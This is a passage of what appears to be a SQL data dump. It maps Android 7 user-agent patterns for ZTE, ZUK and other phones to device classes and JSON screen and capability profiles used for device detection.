Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Z7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Z719DL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Z8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Z80) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Z835) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Z839) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Z851) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Z851M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Z852) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Z855) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Z899VL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Z9 PLUS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Z90) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Z91) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Z965) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Z971) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Z982) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Z983) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ZB553KL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ZC520KL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ZC551KL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ZC553KL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ZC554KL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ZC600KL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ZD552KL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ZD553KL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ZE520KL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ZE552KL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ZTE A0622) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ZTE A2017) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ZTE A2017G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ZTE A2017U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ZTE A2018) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ZTE B2017G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ZTE BLADE A0605) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ZTE BLADE A0620) AppleWebKit/* (KHTML, like Gecko) Chrome (UME) Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ZTE BLADE A0620) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ZTE BLADE A0621) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ZTE BLADE A0622) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ZTE BLADE A320) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ZTE BLADE A321) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ZTE BLADE A330) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ZTE BLADE A520) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ZTE BLADE A520C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ZTE BLADE A521) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ZTE BLADE A6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ZTE BLADE A602) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ZTE BLADE A612) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ZTE BLADE L7A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ZTE BLADE V0800) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ZTE BLADE V0820) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ZTE BLADE V0840) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ZTE BLADE V0850) AppleWebKit/* (KHTML, like Gecko) Chrome (UME) Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ZTE BLADE V0850) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ZTE BLADE V8 MINI) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ZTE Blade A522) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ZTE-Z835) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ZTE-Z971) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ZTE-Z983) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ZTE-Z999) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ZUK Z2121) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ZUK Z2131) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ZUK Z2132) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; arrowsM04) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; arrowsM04-PREMIUM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; bravis_A506) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; brown 1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; cp3636a) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; d-01J) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":640,\"screenHeight\":1024,\"pixelRatio\":2.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; e501) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; e502) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; e551 Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; e551) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; i4U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; i5012) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; i5013) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; i5032) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; i5050) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; i5510) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; i5532) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; i55C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; i55K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; i5D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; i60) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; i7_Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 